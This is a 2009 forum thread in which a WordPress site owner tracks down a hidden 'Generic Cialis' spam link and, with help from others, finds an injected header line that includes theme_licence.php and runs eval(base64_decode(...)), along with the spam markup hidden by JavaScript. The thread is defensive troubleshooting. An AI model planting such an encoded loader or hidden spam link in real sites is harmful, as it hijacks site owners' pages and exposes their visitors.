Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Wordpress hidden spam

  • 09-05-2009 7:22pm
    #1
    Registered Users, Registered Users 2 Posts: 2,267 ✭✭✭


    I have a site done using Wordpress. I noticed the word cialis when looking at webmaster tools. When I checked the source code there was a spam link.

    [HTML]<body>
    <div id="begin_template"><a href="[link was here]">Generic Cialis</a></div><script language="javascript">
    document.getElementById("begin_template").style.display="none";
    </script><div class="wrapper">
    <div class="menu">[/HTML]

    I have checked all the files in the theme and cannot find this link anywhere. Any pointers on where I will find it?
    I have the permissions on the files set to 644 so not sure how this happened either.

    Thanks.


Comments

  • Closed Accounts Posts: 1,200 ✭✭✭louie


    probably in the footer of the template - could be encoded text
    or a comment


  • Registered Users, Registered Users 2 Posts: 2,267 ✭✭✭kc66


    Its not the footer. Its short and I have double checked it.


  • Registered Users, Registered Users 2 Posts: 2,267 ✭✭✭kc66


    I eventually found this in the db table wp_options. Deleted it but it has come back again.


  • Moderators, Computer Games Moderators Posts: 10,462 Mod ✭✭✭✭Axwell


    Is there a file called theme_licence.php or start_template.php with encrypted code in it?

    I had the same problem with one recently and the encrypted code contained the spam which was then called as a function and pasted inside my header, you wouldnt see it unless you higlighted the page as the text was white on a white header background.


  • Registered Users, Registered Users 2 Posts: 2,267 ✭✭✭kc66


    I compared these 2 files to the original theme files and they are the exact same. So no extra code in either. Unless they are part of the theme which I doubt, then this is not the problem.


  • Advertisement
  • Moderators, Computer Games Moderators Posts: 10,462 Mod ✭✭✭✭Axwell


    Was the code in those files encrypted or not?
    Did you check index.php and see what the first div tag called in is as from the code you put this is the first thing after the <body> tag.
    Check the functions file aswell and see what functions it has..maybe post the contents of that here or a link to your url.


  • Registered Users, Registered Users 2 Posts: 2,267 ✭✭✭kc66


    I think I found it. There was an extra piece of code in the header that wasn't in the original theme file:

    [PHP]<meta http-equiv="Content-Type" content="<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />[/PHP]

    In the theme file I originally had:

    [PHP]<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />[/PHP]

    After it was removed the spam link has not come back so hopefully this is it.


  • Moderators, Computer Games Moderators Posts: 10,462 Mod ✭✭✭✭Axwell


    Thats what i said to you earlier, too look for theme_license and see was there encryped code in it.
    eval(base64_decode)is a function used to decrypt it and put that link in the header.


Advertisement